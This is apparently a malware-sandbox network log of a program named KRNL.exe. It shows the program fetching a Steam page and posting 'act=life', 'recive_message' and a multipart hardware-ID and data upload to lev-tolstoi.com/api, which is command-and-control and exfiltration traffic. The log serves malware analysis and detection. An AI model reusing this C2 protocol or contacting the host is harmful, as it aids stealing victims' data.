                                                                                                                                                                                                                                                        2025-01-01 20:27:59 UTC3768INData Raw: 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 61 63 74 69 6f 6e 73 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 73 75 6d 6d 61 72 79 22 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 20 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 5f 73 70 61 63 65 72 22 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 22 3e 0a 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 61 63 74 75 61 6c 5f 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 22
                                                                                                                                                                                                                                                        Data Ascii: </div><div class="profile_header_actions"></div></div><div class="profile_header_summary"><div class="persona_name persona_name_spacer" style="font-size: 24px;"><span class="actual_persona_name"
                                                                                                                                                                                                                                                        2025-01-01 20:27:59 UTC490INData Raw: 72 20 41 67 72 65 65 6d 65 6e 74 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 26 6e 62 73 70 3b 7c 20 26 6e 62 73 70 3b 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 63 63 6f 75 6e 74 2f 63 6f 6f 6b 69 65 70 72 65 66 65 72 65 6e 63 65 73 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6f 6f 6b 69 65 73 3c 2f 61 3e 0a 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 65 73 70 6f 6e 73 69 76 65 5f 6f 70 74 69 6e 5f 6c 69 6e 6b 22 3e 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 74
                                                                                                                                                                                                                                                        Data Ascii: r Agreement</a> &nbsp;| &nbsp;<a href="http://store.steampowered.com/account/cookiepreferences/" target="_blank">Cookies</a></span></span></div><div class="responsive_optin_link"><div class="bt


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        1192.168.2.449734172.67.157.2544432120C:\Users\user\Desktop\KRNL.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-01 20:28:00 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        Content-Length: 8
                                                                                                                                                                                                                                                        Host: lev-tolstoi.com
                                                                                                                                                                                                                                                        2025-01-01 20:28:00 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                        Data Ascii: act=life
                                                                                                                                                                                                                                                        2025-01-01 20:28:00 UTC1121INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 01 Jan 2025 20:28:00 GMT
                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=5kic491f94ui7dg8efk9jj9n10; expires=Sun, 27 Apr 2025 14:14:39 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g3J9VQd2uCot4sqVW1ZB3hLWEUPTOIWeRL01Qw%2BNpjtXYvEoWEDaqkTY%2FWBl4gpuWrLvYL9nvVItsIUWla2jDNX68c7ti5GWWt4jr8PJVTQCLJhPlQwyg2FKkmoE0R2Nnqw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                        CF-RAY: 8fb540d57e2717b5-EWR
                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1470&min_rtt=1464&rtt_var=562&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2834&recv_bytes=906&delivery_rate=1923583&cwnd=252&unsent_bytes=0&cid=2a4f74acb9396462&ts=438&x=0"
                                                                                                                                                                                                                                                        2025-01-01 20:28:00 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                                        Data Ascii: 2ok
                                                                                                                                                                                                                                                        2025-01-01 20:28:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        2192.168.2.449735172.67.157.2544432120C:\Users\user\Desktop\KRNL.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-01 20:28:01 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        Content-Length: 51
                                                                                                                                                                                                                                                        Host: lev-tolstoi.com
                                                                                                                                                                                                                                                        2025-01-01 20:28:01 UTC51OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 36 32 39 39 31 32 35 33 35 26 6a 3d
                                                                                                                                                                                                                                                        Data Ascii: act=recive_message&ver=4.0&lid=yau6Na--629912535&j=
                                                                                                                                                                                                                                                        2025-01-01 20:28:01 UTC1119INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 01 Jan 2025 20:28:01 GMT
                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=c1majle6bae5vfish6i596kge6; expires=Sun, 27 Apr 2025 14:14:40 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cI1JZxeWymFv0ABUHswjOFVNlwhgx8v4jHeMUXHeJmnGK5OdsDVrSZuoFBMA1Ti168TQP%2FxyYDRhKMquwYznFKZTPt24oYZNCYt6kHXcWWgSRkaOzOV3M5sFs0xz6fdmPtc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                        CF-RAY: 8fb540db3eb1184d-EWR
                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1508&min_rtt=1502&rtt_var=576&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=950&delivery_rate=1880231&cwnd=239&unsent_bytes=0&cid=bcdc0c9d5b389b49&ts=500&x=0"
                                                                                                                                                                                                                                                        2025-01-01 20:28:01 UTC250INData Raw: 31 63 63 33 0d 0a 6c 4b 6e 61 79 65 76 32 72 4f 38 78 79 54 6d 4e 50 70 6f 4c 39 62 55 37 70 46 58 75 4b 68 59 55 46 31 51 39 36 70 71 46 43 70 50 76 69 36 7a 72 30 63 4b 41 7a 55 4b 73 47 37 64 4b 36 48 36 51 6d 52 6e 46 4d 63 77 51 63 48 56 37 4a 31 6a 47 75 50 4e 6e 73 61 37 50 75 36 57 59 6b 34 44 4e 56 4c 45 62 74 32 58 68 4b 5a 44 62 47 5a 35 33 69 30 42 30 64 58 73 32 58 49 48 31 39 57 62 77 2f 4d 57 39 6f 59 36 56 79 49 35 64 70 46 7a 6f 57 2f 74 68 6d 39 78 57 7a 44 6a 4d 42 6a 52 78 62 58 59 48 79 4e 66 67 66 76 4c 5a 79 4b 6d 69 79 59 75 41 6c 42 4f 73 56 36 38 45 75 47 71 51 31 31 66 43 4d 59 56 43 66 6e 78 7a 4e 31 6d 41 36 75 78 73 2b 2f 7a 4c 76 71 43 45 6e 4e 79 44 56 36 4e 58 37 6c 48 37 4b 64 6d 58 58 74 35 33 31 41 67 6e
                                                                                                                                                                                                                                                        Data Ascii: 1cc3lKnayev2rO8xyTmNPpoL9bU7pFXuKhYUF1Q96pqFCpPvi6zr0cKAzUKsG7dK6H6QmRnFMcwQcHV7J1jGuPNnsa7Pu6WYk4DNVLEbt2XhKZDbGZ53i0B0dXs2XIH19Wbw/MW9oY6VyI5dpFzoW/thm9xWzDjMBjRxbXYHyNfgfvLZyKmiyYuAlBOsV68EuGqQ11fCMYVCfnxzN1mA6uxs+/zLvqCEnNyDV6NX7lH7KdmXXt531Agn
                                                                                                                                                                                                                                                        2025-01-01 20:28:01 UTC1369INData Raw: 52 48 59 6e 54 70 33 31 39 32 36 78 36 59 57 68 36 34 36 59 6a 74 55 54 6f 31 66 68 57 66 74 6d 6b 4e 5a 5a 31 44 69 4d 53 33 78 2b 63 54 78 51 68 2f 66 70 59 76 62 2b 77 72 2b 6b 6a 70 7a 49 67 6c 44 72 46 61 39 62 34 43 6e 50 6c 33 6e 57 4e 49 39 63 65 57 63 31 4b 52 47 52 75 4f 42 6b 73 61 36 4c 76 71 57 49 6d 63 36 66 57 36 42 51 36 6b 37 7a 59 4a 72 61 57 63 73 39 67 30 74 30 63 58 38 38 55 49 4c 38 36 6d 58 33 39 73 76 34 35 63 6d 54 31 73 30 4c 36 33 6a 71 54 50 39 6c 67 5a 56 6a 68 69 6a 43 55 54 52 78 65 58 59 48 79 50 44 69 61 2f 4c 39 78 4c 75 6a 67 6f 62 4f 6e 31 57 6d 58 76 31 61 2f 57 65 64 31 45 76 4d 4f 59 70 4c 66 58 31 38 4d 31 69 4d 75 4b 6b 6f 39 75 36 4c 34 4f 75 6f 6d 63 57 42 57 62 78 62 72 30 4f 32 63 4e 66 51 56 59 5a 76 7a 45 78
                                                                                                                                                                                                                                                        Data Ascii: RHYnTp31926x6YWh646YjtUTo1fhWftmkNZZ1DiMS3x+cTxQh/fpYvb+wr+kjpzIglDrFa9b4CnPl3nWNI9ceWc1KRGRuOBksa6LvqWImc6fW6BQ6k7zYJraWcs9g0t0cX88UIL86mX39sv45cmT1s0L63jqTP9lgZVjhijCUTRxeXYHyPDia/L9xLujgobOn1WmXv1a/Wed1EvMOYpLfX18M1iMuKko9u6L4OuomcWBWbxbr0O2cNfQVYZvzEx
                                                                                                                                                                                                                                                        2025-01-01 20:28:01 UTC1369INData Raw: 42 2b 50 34 4b 63 77 73 64 7a 49 72 4b 69 44 31 76 75 4f 58 61 56 63 2b 52 7a 6e 4a 34 36 58 58 73 70 33 31 41 68 35 64 33 30 77 54 59 66 31 35 47 62 2f 2b 63 36 33 6f 34 6d 55 77 34 68 58 6f 46 44 73 55 66 78 37 6e 64 64 52 77 7a 61 47 51 6a 51 34 4e 54 46 48 79 4b 43 6e 57 65 62 39 69 59 32 6f 68 35 72 4a 6d 78 4f 30 46 66 59 63 2f 32 58 58 6a 78 6e 4c 50 34 6c 4e 65 33 64 2f 4f 46 71 43 39 4f 39 6d 38 75 54 45 76 4b 75 46 6e 4d 53 41 58 61 39 54 35 6c 66 7a 62 35 66 57 55 34 5a 35 7a 45 39 73 4e 69 31 32 61 34 2f 30 36 6d 65 7a 77 38 69 32 70 59 36 43 6a 70 49 64 73 68 76 6f 55 4c 67 78 31 39 74 51 78 6a 79 47 54 48 52 78 65 44 4e 63 6a 2f 76 71 62 2f 76 34 7a 4c 79 6e 67 4a 6e 49 6a 56 53 76 58 76 31 5a 38 57 57 62 6c 78 65 47 4d 4a 51 49 4c 44 5a 61
                                                                                                                                                                                                                                                        Data Ascii: B+P4KcwsdzIrKiD1vuOXaVc+RznJ46XXsp31Ah5d30wTYf15Gb/+c63o4mUw4hXoFDsUfx7nddRwzaGQjQ4NTFHyKCnWeb9iY2oh5rJmxO0FfYc/2XXjxnLP4lNe3d/OFqC9O9m8uTEvKuFnMSAXa9T5lfzb5fWU4Z5zE9sNi12a4/06mezw8i2pY6CjpIdshvoULgx19tQxjyGTHRxeDNcj/vqb/v4zLyngJnIjVSvXv1Z8WWblxeGMJQILDZa
                                                                                                                                                                                                                                                        2025-01-01 20:28:01 UTC1369INData Raw: 43 6e 59 66 6a 6b 78 62 61 69 68 4a 4c 47 69 6c 32 6d 55 4f 6c 58 2f 32 36 52 32 6c 48 4c 4d 6f 39 4a 63 48 78 6e 4e 56 53 43 39 65 30 6f 76 37 62 4d 6f 4f 76 52 31 4f 6d 42 65 72 74 41 2f 55 71 34 64 74 6e 4f 47 63 45 37 7a 42 41 30 64 58 6f 2f 55 49 44 77 36 47 66 31 2b 4d 32 2b 70 6f 79 62 78 4a 39 62 70 56 62 6b 55 2f 4e 37 6c 39 70 64 79 6a 4f 45 51 33 34 32 4f 33 5a 59 6b 4c 69 2f 4b 4d 54 37 78 4c 69 6f 6e 39 54 52 77 30 72 72 58 4f 4d 63 6f 43 6d 62 32 56 6e 4a 4f 34 42 44 66 48 64 35 4f 46 69 4e 38 65 39 67 34 2f 66 50 73 4b 71 48 6d 38 2b 4a 56 71 35 66 36 46 6a 2b 5a 74 65 5a 47 63 45 76 7a 42 41 30 57 56 49 44 48 61 6e 43 70 33 65 2f 37 34 75 2f 70 38 6e 4d 6a 6f 46 51 70 31 50 67 57 76 46 6c 6e 64 35 53 79 6a 79 49 52 48 31 7a 63 7a 64 61 6a
                                                                                                                                                                                                                                                        Data Ascii: CnYfjkxbaihJLGil2mUOlX/26R2lHLMo9JcHxnNVSC9e0ov7bMoOvR1OmBertA/Uq4dtnOGcE7zBA0dXo/UIDw6Gf1+M2+poybxJ9bpVbkU/N7l9pdyjOEQ342O3ZYkLi/KMT7xLion9TRw0rrXOMcoCmb2VnJO4BDfHd5OFiN8e9g4/fPsKqHm8+JVq5f6Fj+ZteZGcEvzBA0WVIDHanCp3e/74u/p8nMjoFQp1PgWvFlnd5SyjyIRH1zczdaj
                                                                                                                                                                                                                                                        2025-01-01 20:28:01 UTC1369INData Raw: 34 35 4d 57 31 70 49 47 63 78 34 78 58 72 6c 62 70 55 50 4a 6f 6b 4e 6c 58 7a 6e 66 43 43 48 4e 75 4e 57 34 66 71 65 6a 38 65 75 66 37 36 72 57 6b 79 59 75 41 6c 42 4f 73 56 36 38 45 75 47 43 46 30 31 54 55 50 6f 74 47 65 33 56 6e 4e 31 4b 44 36 75 42 6e 39 66 48 48 76 71 53 50 6c 63 75 48 58 36 78 65 35 46 50 30 4b 64 6d 58 58 74 35 33 31 41 68 61 66 57 59 68 58 49 62 7a 38 58 4f 78 36 59 57 68 36 34 36 59 6a 74 55 54 71 46 44 6b 57 50 68 6c 6c 39 4e 55 78 69 57 44 54 33 4e 2f 66 69 52 56 6a 2f 2f 73 59 50 72 35 7a 61 71 6e 68 34 62 4c 6e 30 48 72 46 61 39 62 34 43 6e 50 6c 32 2f 42 4a 35 78 4c 4e 6b 64 6a 4e 55 6d 44 39 65 73 6f 37 72 6a 53 2b 4b 79 46 31 4a 62 4e 56 61 52 53 37 46 50 35 59 4a 76 61 58 4d 38 79 6a 55 35 77 66 48 38 32 57 59 37 35 34 6d
                                                                                                                                                                                                                                                        Data Ascii: 45MW1pIGcx4xXrlbpUPJokNlXznfCCHNuNW4fqej8euf76rWkyYuAlBOsV68EuGCF01TUPotGe3VnN1KD6uBn9fHHvqSPlcuHX6xe5FP0KdmXXt531AhafWYhXIbz8XOx6YWh646YjtUTqFDkWPhll9NUxiWDT3N/fiRVj//sYPr5zaqnh4bLn0HrFa9b4CnPl2/BJ5xLNkdjNUmD9eso7rjS+KyF1JbNVaRS7FP5YJvaXM8yjU5wfH82WY754m
                                                                                                                                                                                                                                                        2025-01-01 20:28:01 UTC1369INData Raw: 74 4f 76 52 31 4d 32 4b 55 4b 70 52 35 6c 44 33 62 70 50 46 55 38 45 6c 6a 55 6c 2f 65 33 6b 32 55 6f 58 79 35 6d 48 38 2b 73 61 2f 72 49 61 52 6a 73 4d 54 72 45 4f 76 42 4c 68 49 6d 74 78 56 6e 57 33 4d 56 7a 70 76 4e 54 46 54 79 4b 43 6e 61 50 76 7a 77 62 57 6f 68 70 66 63 6a 46 57 35 57 2b 4a 57 36 6d 4f 63 30 6c 54 4c 4f 6f 39 4f 63 6e 31 35 4a 46 61 49 2b 2b 77 6f 76 37 62 4d 6f 4f 76 52 31 4f 32 61 52 61 46 63 34 30 72 7a 61 4a 54 42 56 4e 5a 33 77 67 68 6c 63 57 52 32 42 35 37 6f 38 47 2f 75 75 4e 4c 34 72 49 58 55 6c 73 31 56 6f 6c 33 6f 57 76 5a 37 6b 74 46 57 79 54 36 46 54 48 78 31 64 54 4a 62 6a 2f 33 6b 5a 50 72 78 79 4c 65 76 67 4a 72 48 67 68 50 6c 47 2b 68 45 75 44 48 58 39 6b 4c 46 4f 34 45 49 61 7a 68 73 64 6c 69 45 75 4c 38 6f 2f 66 6a
                                                                                                                                                                                                                                                        Data Ascii: tOvR1M2KUKpR5lD3bpPFU8EljUl/e3k2UoXy5mH8+sa/rIaRjsMTrEOvBLhImtxVnW3MVzpvNTFTyKCnaPvzwbWohpfcjFW5W+JW6mOc0lTLOo9Ocn15JFaI++wov7bMoOvR1O2aRaFc40rzaJTBVNZ3wghlcWR2B57o8G/uuNL4rIXUls1Vol3oWvZ7ktFWyT6FTHx1dTJbj/3kZPrxyLevgJrHghPlG+hEuDHX9kLFO4EIazhsdliEuL8o/fj
                                                                                                                                                                                                                                                        2025-01-01 20:28:01 UTC276INData Raw: 35 48 4a 6d 78 47 65 57 4f 46 53 2f 33 2f 58 79 47 61 49 64 34 4e 53 4e 43 35 4d 4c 78 2b 50 39 4b 63 77 73 65 50 4d 75 4b 79 54 67 73 6d 42 51 71 42 57 34 33 37 33 62 6f 48 55 56 73 55 6d 68 51 52 2f 65 7a 56 34 48 34 2f 67 70 7a 43 78 32 63 79 75 71 4b 61 58 33 34 51 54 35 52 76 6f 53 72 67 78 31 2b 6b 5a 31 44 53 63 53 33 74 6e 53 33 59 48 6b 63 61 6e 59 2b 66 78 32 37 75 39 67 70 6e 43 6e 47 33 72 41 37 73 4f 71 6a 76 46 68 55 61 47 4b 4c 4d 47 4e 48 63 31 62 6d 61 52 75 50 45 6f 71 61 53 46 2b 4c 6e 4a 7a 49 37 4b 55 4c 6c 4a 36 56 2f 75 61 74 44 70 5a 2b 45 68 68 6b 39 6b 63 57 49 35 48 38 61 34 36 43 69 70 7a 34 75 78 72 4a 4b 46 32 49 42 44 72 42 76 51 45 72 68 78 31 34 38 5a 38 7a 53 43 52 6e 4e 67 5a 48 74 34 6e 76 4c 67 65 50 62 68 78 50 6a 6c
                                                                                                                                                                                                                                                        Data Ascii: 5HJmxGeWOFS/3/XyGaId4NSNC5MLx+P9KcwsePMuKyTgsmBQqBW4373boHUVsUmhQR/ezV4H4/gpzCx2cyuqKaX34QT5RvoSrgx1+kZ1DScS3tnS3YHkcanY+fx27u9gpnCnG3rA7sOqjvFhUaGKLMGNHc1bmaRuPEoqaSF+LnJzI7KULlJ6V/uatDpZ+Ehhk9kcWI5H8a46Cipz4uxrJKF2IBDrBvQErhx148Z8zSCRnNgZHt4nvLgePbhxPjl
                                                                                                                                                                                                                                                        2025-01-01 20:28:01 UTC1369INData Raw: 32 63 64 31 0d 0a 54 5a 4e 73 59 4a 6d 6b 37 4c 78 2b 65 75 4c 38 36 76 37 62 5a 2b 50 50 4a 30 38 32 66 51 61 31 59 2b 56 2b 2f 56 36 6e 77 51 38 73 78 6d 31 6c 4b 53 48 49 73 55 6f 37 76 39 69 54 6b 39 63 57 32 72 4a 2f 55 67 4d 31 63 36 77 50 57 48 4c 41 70 71 4a 6b 5a 33 6e 66 55 43 45 46 31 65 7a 68 59 6e 75 6d 71 54 2b 76 37 7a 61 2b 36 79 64 71 4f 69 78 50 7a 43 61 45 63 2f 48 6a 58 6a 77 6d 55 62 4e 6b 62 49 79 59 6e 4b 52 47 52 75 50 45 6f 71 61 53 46 2b 4c 6e 4a 7a 49 37 4b 55 4c 6c 4a 36 56 2f 75 61 74 44 70 5a 2b 67 77 69 6b 31 7a 5a 6a 63 59 56 4a 7a 2f 70 79 61 78 2b 59 76 67 6b 73 6e 63 6a 72 49 64 36 30 4f 76 42 4c 68 63 6c 4e 6c 58 77 53 47 64 42 56 70 78 63 7a 4e 59 6d 4c 72 4a 59 2b 58 78 69 2f 62 72 6a 39 53 57 33 52 33 72 58 2f 34 63
                                                                                                                                                                                                                                                        Data Ascii: 2cd1TZNsYJmk7Lx+euL86v7bZ+PPJ082fQa1Y+V+/V6nwQ8sxm1lKSHIsUo7v9iTk9cW2rJ/UgM1c6wPWHLApqJkZ3nfUCEF1ezhYnumqT+v7za+6ydqOixPzCaEc/HjXjwmUbNkbIyYnKRGRuPEoqaSF+LnJzI7KULlJ6V/uatDpZ+gwik1zZjcYVJz/pyax+YvgksncjrId60OvBLhclNlXwSGdBVpxczNYmLrJY+Xxi/brj9SW3R3rX/4c
                                                                                                                                                                                                                                                        2025-01-01 20:28:01 UTC1369INData Raw: 5a 50 31 69 43 44 64 6b 70 6a 64 6a 68 52 6a 2b 37 32 4b 4c 2b 32 78 50 6a 7a 73 4e 53 47 7a 57 7a 6c 47 2f 63 63 6f 43 6d 69 31 46 66 49 4d 4a 70 5a 4f 56 46 37 4d 56 36 65 36 50 42 6e 73 62 69 4c 76 75 76 52 78 6f 44 4e 56 37 6f 62 74 77 79 71 4d 73 4b 45 44 70 5a 6c 6b 77 5a 74 4e 6d 4e 32 42 39 71 32 70 33 71 78 72 6f 76 2f 71 4a 75 47 79 49 35 46 71 42 7a 52 59 74 39 6e 6b 4e 5a 50 31 69 43 44 42 31 70 41 56 41 68 68 6e 66 76 70 5a 76 62 67 32 76 6a 6c 79 5a 75 4f 31 57 72 72 45 36 39 6a 74 69 6d 50 6c 77 47 47 41 6f 39 47 65 6e 46 6a 4a 78 4b 76 39 75 42 70 35 2b 62 63 74 2b 53 6e 6f 75 2f 4e 48 65 74 64 72 77 53 71 4a 39 66 54 53 49 5a 76 33 42 6f 76 49 79 5a 68 44 39 72 6e 71 58 47 78 34 49 76 67 2b 63 66 55 33 4d 30 4c 36 78 7a 73 54 75 70 76 6c
                                                                                                                                                                                                                                                        Data Ascii: ZP1iCDdkpjdjhRj+72KL+2xPjzsNSGzWzlG/ccoCmi1FfIMJpZOVF7MV6e6PBnsbiLvuvRxoDNV7obtwyqMsKEDpZlkwZtNmN2B9q2p3qxrov/qJuGyI5FqBzRYt9nkNZP1iCDB1pAVAhhnfvpZvbg2vjlyZuO1WrrE69jtimPlwGGAo9GenFjJxKv9uBp5+bct+Snou/NHetdrwSqJ9fTSIZv3BovIyZhD9rnqXGx4Ivg+cfU3M0L6xzsTupvl


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        3192.168.2.449736172.67.157.2544432120C:\Users\user\Desktop\KRNL.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-01 20:28:02 UTC277OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=LC4OYBSII4ZCJL
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        Content-Length: 18143
                                                                                                                                                                                                                                                        Host: lev-tolstoi.com
                                                                                                                                                                                                                                                        2025-01-01 20:28:02 UTC15331OUTData Raw: 2d 2d 4c 43 34 4f 59 42 53 49 49 34 5a 43 4a 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 42 44 32 35 31 32 33 38 44 43 35 33 31 46 31 42 43 46 44 36 38 42 37 37 34 45 46 39 42 37 41 0d 0a 2d 2d 4c 43 34 4f 59 42 53 49 49 34 5a 43 4a 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4c 43 34 4f 59 42 53 49 49 34 5a 43 4a 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 32 39 39 31 32 35 33 35 0d 0a 2d 2d 4c 43 34 4f
                                                                                                                                                                                                                                                        Data Ascii: --LC4OYBSII4ZCJLContent-Disposition: form-data; name="hwid"3BD251238DC531F1BCFD68B774EF9B7A--LC4OYBSII4ZCJLContent-Disposition: form-data; name="pid"2--LC4OYBSII4ZCJLContent-Disposition: form-data; name="lid"yau6Na--629912535--LC4O
                                                                                                                                                                                                                                                        2025-01-01 20:28:02 UTC2812OUTData Raw: cb 99 64 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f
                                                                                                                                                                                                                                                        Data Ascii: d~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wE
                                                                                                                                                                                                                                                        2025-01-01 20:28:02 UTC1133INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 01 Jan 2025 20:28:02 GMT
                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
